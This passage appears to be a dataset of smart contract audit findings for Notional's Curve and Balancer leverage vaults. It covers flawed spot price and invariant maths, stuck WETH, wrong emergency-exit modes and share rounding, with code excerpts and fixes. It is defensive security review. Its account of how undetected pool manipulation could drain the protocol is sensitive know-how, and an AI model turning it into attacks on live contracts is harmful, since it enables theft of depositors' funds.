POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\nчThe spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\nчThe spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade to execute against the manipulated pool, leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.ч```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n -Incorrect Spot PriceчhighчMultiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on the `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK's provide a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code in the Leverage Vault to compute $b$ is not equivalent to the above.\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, for a composable pool, it can support up to five (5) tokens in a pool. $S$ should be as follows, where $balances$ is all the tokens in a composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). Otherwise, this was not implemented within the code.чGiven multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK and due to the lack of information on the web, it is recommended to reach out to the Balancer's protocol team to identify the actual formula used to determine a spot price of any two tokens within a composable pool and check out if the formula in the SDK is up-to-date to be used against the composable pool.\\nIt is also recommended to implement additional tests to ensure that the `_calcSpotPrice` returns the correct spot price of composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.чThe spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.ч```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n -Incorrect invariant used for Balancer's composable poolsчhighчOnly two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n```\\n\\nWithin the `_poolDerivatives` function, the `balances` used to compute the invariant consist of the balance of all tokens in the pool, except for BPT, which is aligned with the earlier understanding.\\n```\\nexport function _poolDerivatives(\\n A: BigNumber,\\n balances: OldBigNumber[],\\n tokenIndexIn: number,\\n tokenIndexOut: number,\\n is_first_derivative: boolean,\\n wrt_out: boolean\\n): OldBigNumber {\\n const totalCoins = balances.length;\\n const D = _invariant(A, balances);\\n```\\nчReview if there is any specific reason for passing in only the balance of two tokens when computing the invariant. Otherwise, the balance of all tokens (except BPT) should be used to compute the invariant.\\nIn addition, it is recommended to include additional tests to ensure that the computed spot price is aligned with the market price.чAn incorrect invariant will lead to an incorrect spot price being computed. The spot price is used within the `_checkPriceAndCalculateValue` function that is intended to revert if the spot price on the pool is not within some deviation tolerance of the implied oracle price to prevent any pool manipulation. As a result, incorrect spot price leads to false positives or false negatives, where, in the worst-case scenario, pool manipulation was not caught by this function, and the transaction proceeded to be executed.\\nThe `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning, it will cause the vault to add liquidity into a pool that has been manipulated, leading to a loss of assets.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.ч```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n -Unable to reinvest if the reward token equals one of the pool tokensчhighчIf the reward token is the same as one of the pool tokens, the protocol would not be able to reinvest such a reward token. Thus leading to a loss of assets for the vault shareholders.\\nDuring the reinvestment process, the `reinvestReward` function will be executed once for each reward token. The length of the `trades` listing defined in the payload must be the same as the number of tokens in the pool per Line 339 below.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n\\nIn addition, due to the requirement at Line 105, each element in the `trades` listing must be a token within a pool and must be ordered in sequence according to the token index of the pool.\\n```\\nFile: StrategyUtils.sol\\n function executeRewardTrades(\\n IERC20[] memory tokens,\\n SingleSidedRewardTradeParams[] calldata trades,\\n address rewardToken,\\n address poolToken\\n ) external returns(uint256[] memory amounts, uint256 amountSold) {\\n amounts = new uint256[](trades.length);\\n for (uint256 i; i < trades.length; i++) {\\n // All trades must sell the same token.\\n require(trades[i].sellToken == rewardToken);\\n // Bypass certain invalid trades\\n if (trades[i].amount == 0) continue;\\n if (trades[i].buyToken == poolToken) continue;\\n\\n // The reward trade can only purchase tokens that go into the pool\\n require(trades[i].buyToken == address(tokens[i]));\\n```\\n\\nAssuming the TriCRV Curve pool (crvUSD+WETH+CRV) has two reward tokens (CRV & CVX). This example is taken from a live Curve pool on Ethereum (Reference 1 Reference 2)\\nThe pool will consist of the following tokens:\\n```\\ntokens[0] = crvUSD\\ntokens[1] = WETH\\ntokens[2] = CRV\\n```\\n\\nThus, if the protocol receives 3000 CVX reward tokens and it intends to sell 1000 CVX for crvUSD and 1000 CVX for WETH.\\nThe `trades` list has to be defined as below.\\n```\\ntrades[0].sellToken[0] = CRV (rewardToken) | trades[0].buyToken = crvUSD | trades[0].amount = 1000\\ntrades[1].sellToken[1] = CRV (rewardToken) | trades[1].buyToken = WETH | trades[0].amount = 1000\\ntrades[1].sellToken[2] = CRV (rewardToken) | trades[1].buyToken = CRV | trades[0].amount = 0\\n```\\n\\nThe same issue also affects the Balancer pools. Thus, the example is omitted for brevity. One of the affected Balancer pools is as follows, where the reward token is also one of the pool tokens.\\nWETH-AURA - Reference 1 Reference 2 (Reward Tokens = [BAL, AURA])\\nHowever, the issue is that the `_isInvalidRewardToken` function within the `_executeRewardTrades` will always revert.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _executeRewardTrades(SingleSidedRewardTradeParams[] calldata trades) internal returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256[] memory amounts\\n ) {\\n // The sell token on all trades must be the same (checked inside executeRewardTrades) so\\n // just validate here that the sellToken is a valid reward token (i.e. none of the tokens\\n // used in the regular functioning of the vault).\\n rewardToken = trades[0].sellToken;\\n if (_isInvalidRewardToken(rewardToken)) revert Errors.InvalidRewardToken(rewardToken);\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n (amounts, amountSold) = StrategyUtils.executeRewardTrades(\\n tokens, trades, rewardToken, address(POOL_TOKEN())\\n );\\n }\\n```\\n\\nThe reason is that within the `_isInvalidRewardToken` function it checks if the reward token to be sold is any of the pool tokens. In this case, the condition will be evaluated to be true, and a revert will occur. As a result, the protocol would not be able to reinvest such reward tokens.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\nчConsider tracking the number of pool tokens received during an emergency exit, and segregate these tokens with the reward tokens. For instance, the vault has 3000 CVX, 1000 of them are received during the emergency exit, while the rest are reward tokens emitted from Convex/Aura. In this case, the protocol can sell all CVX on the vault except for the 1000 CVX reserved.чThe reinvestment of reward tokens is a critical component of the vault. The value per vault share increases when reward tokens are sold for the pool tokens and reinvested back into the Curve/Balancer pool to obtain more LP tokens. If this feature does not work as intended, it will lead to a loss of assets for the vault shareholders.ч```\\nFile: SingleSidedLPVaultBase.sol\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n```\\n -Native ETH not received when removing liquidity from Curve V2 poolsчhighчNative ETH was not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nCurve V2 pool will always wrap to WETH and send to leverage vault unless the `use_eth` is explicitly set to `True`. Otherwise, it will default to `False`. The following implementation of the `remove_liquidity_one_coin` function taken from one of the Curve V2 pools shows that unless the `use_eth` is set to `True`, the `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, \"Slippage\"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b\"\", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(\"transfer(address,uint256)\")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. Thus, WETH instead of Native ETH will be returned during remove liquidity. As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\nчIf one of the pool tokens is ETH, consider setting `is_eth` to true when calling `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.чFollowing are some of the impacts due to the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin the `redeemFromNotional`, if the vaults consist of ETH, the `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to `transfer` Native ETH, which will fail as Native ETH is not received and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, WETH is not re-entered into the pool as only Native ETH residing in the vault will be transferred to the pool. Leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will be converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault. This causes the value per share to drop significantly. (Reference)\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`ч```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, \"Slippage\"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b\"\", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id(\"transfer(address,uint256)\")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n -Single-sided instead of proportional exit is performed during emergency exitчhighчSingle-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\nчSet the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\nчThe following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens one-sided incurs unnecessary slippage as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nPer the source code comment below, in other words, unless a proportional exit is performed, the emergency exit will be subjected to front-run attack and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault only held one of the pool tokens. To re-enter the pool, the vault has to either swap the token to other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods will incur unnecessary slippage, resulting in fewer LP tokens received at the end.ч```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n -reinvestReward() generates dust totalPoolClaim causing vault abnormalчmediumчIf the first user deposits too small , due to the round down, it may result in 0 shares, which will result in 0 shares no matter how much is deposited later. In `National`, this situation will be prevented by setting `a minimum borrow size and a minimum leverage ratio`. However, `reinvestReward()` does not have this restriction, which may cause this problem to still exist, causing the vault to enter an abnormal state.\\nThe calculation of the shares of the vault is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, due to the conversion to `INTERNAL_TOKEN_PRECISION`, the precision is lost, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but `totalVaultSharesGlobal=0`, so `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and the would have none. there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account \"rolling\" a position from one debt maturity to another. in this case, a small excess amount of deposit may come into 